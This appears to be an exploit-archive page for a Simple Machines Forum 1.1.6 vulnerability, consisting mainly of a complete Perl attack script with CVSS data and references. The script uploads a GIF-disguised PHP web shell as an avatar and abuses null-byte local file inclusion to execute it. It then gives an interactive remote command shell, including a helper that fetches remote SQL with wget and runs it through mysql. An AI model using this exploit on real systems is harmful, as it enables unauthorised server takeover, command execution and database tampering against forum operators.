Simple Machines Forum <= 1.1.6 (LFI) Code Execution Exploit

2009.04.09
Credit: ~elmysterio
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5.5/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

#!/usr/bin/perl # # @title: Simple Machines Forum Code Execution # @versn: * <= 1.1.6 # @authr: ~elmysterio ( a.k.a us ) # @stats: DROPPED!!!!!!! # @descp: In loving memory of the rare bone marrow disease that killed rgod. # We can't thank you enough for killing a bug killer. # @bug : Sources/QueryString.php & Sources/Themes.php w/ magic_quotes == Off # @gr33t: m0rt's failure, it never stops. # # C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl # -s http://localhost/audit/smf116 -u regular -p test -d # [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution # [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d # [ii] User Id = 2 # [ii] Uploaded a shell... # [cmd@win32]$ ver # # Microsoft Windows XP [Version 5.1.2600] # # [cmd@win32]$ # # FOR LULZ PURPOSE ONLY!! # use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; use Getopt::Long qw(:config no_ignore_case); print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n"; my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" ); my %parms = ( s => "", d => 0, x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); }, u => "Gl0ria!!!", p => "gl0ria\@herb3st" ); GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s"; if( !$parms{s} ) { die <<HELP [ii] usage: $0 <parms> [-s] Site -> http://site.com/forums [-x] Proxy -> localhost:8118 [-u] Username -> Gl0ria!!! [-p] Password -> gl0ria\@herb3st [-d] Debug HELP } my $shell = chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61). chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00). chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00). chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00). chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00). chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00). chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00). chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00). chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00); $shell .= <<'EXIF'; <?php error_reporting(0);ini_set('max_execution_time',0); $x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' : '0'); if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;} print '---1243---';if($z){print eval($x);}else{print passthru($x);}print '---3421---';exit; ?> EXIF $shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00). chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00). chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00). chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00). chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00). chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00). chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00). chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00). chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00). chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00). chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00). chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00). chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00). chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00). chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00). chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00). chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00). chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00). chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00). chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00). chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00). chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00). chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00). chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00). chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00). chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00). chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00). chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00). chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00). chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00). chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00). chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00). chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00). chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00). chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00). chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7). chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28). chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77). chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00). chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00). chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00). chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00). chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62). chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01). chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00). chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29). chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77). chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7). chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00). chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f). chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77). chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00). chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00). chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff). chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff). chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10). chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77). chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00). chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8). chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00). chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10). chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77). chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4). chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00). chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02). chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00). chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01). chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00). chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7). chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01). chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00). chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a). chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30). chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69). chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74). chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69). chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00). chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00). chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00). chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04). chr(0x04).chr(0x00).chr(0x3b).chr(0x00); ## Logging in my $ret = $ua->post("$parms{s}/index.php?action=login2", [ user => $parms{u}, passwrd => $parms{p}, cookielength => -1 ]); ## Getting id, sid and checking to see if we're logged on $ret = $ua->get("$parms{s}/index.php?action=profile"); die "[!!] Wrong username/password\n" unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/; die "[!!] Error getting session id\n" unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/; die "[!!] Error getting id\n" unless my($id) = $ret->as_string =~ /u=(\d+);/; print "[ii] Session ID = $sid\n". "[ii] User Id = $id\n" if $parms{d}; ## Checking for shell $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited"); &shell if $ret->as_string =~ /expl0ited/; $ret = $ua->request( POST "$parms{s}/index.php?action=profile2", Content_Type => 'multipart/form-data', Content => [ avatar_choice => "upload", sc => $sid, userID => $id, sa => "forumProfile", attachment => [ undef, "expl0ited.gif", Content => $shell, "Content-Type" => "image/gif" ] ]); ## Updating Settings.php $ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500"); print "[ii] Uploaded a shell...\n" if $parms{d}; shell(); ## lulz @ this shit. sub shell { my ($full,$base,$user,$pass,$file,$cmd,$os,$sh); $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' ); ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s; die "[!!] magic_quotes is turned on\n" if (not defined $os or not defined $sh or $1 eq $id); $sh = $sh ? "php" : "cmd"; $os = $os =~ /win/i ? "win32" : "unix"; do { print "[$sh\@$os]\$ "; $cmd = chomp (my $cmd = <STDIN>); exit unless $cmd !~ /^exit$/i; if( ($file) = $cmd =~ /^savefile (.*?) / ) { $cmd =~ s/savefile $1 //; } else { undef $file; } if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) { ($base) = $full =~ /\/(.*?)$/; $cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;"; } $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd); $ret->as_string =~ /---1243---(.*?)---3421---/s; print "$1\n"; if( defined $file ) { open FILE, ">>", $file or die "[!!] Error writing to file; $!\n"; print FILE "Command Executed: $cmd\n". "Host: $parms{s}\n$1\n"; close FILE; } } while( $cmd !~ /^exit$/i ); exit; }

References:

http://www.simplemachines.org/community/index.php?topic=272861.0
http://www.securityfocus.com/bid/32139
http://www.milw0rm.com/exploits/7011
http://secunia.com/advisories/32516
http://osvdb.org/50072


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top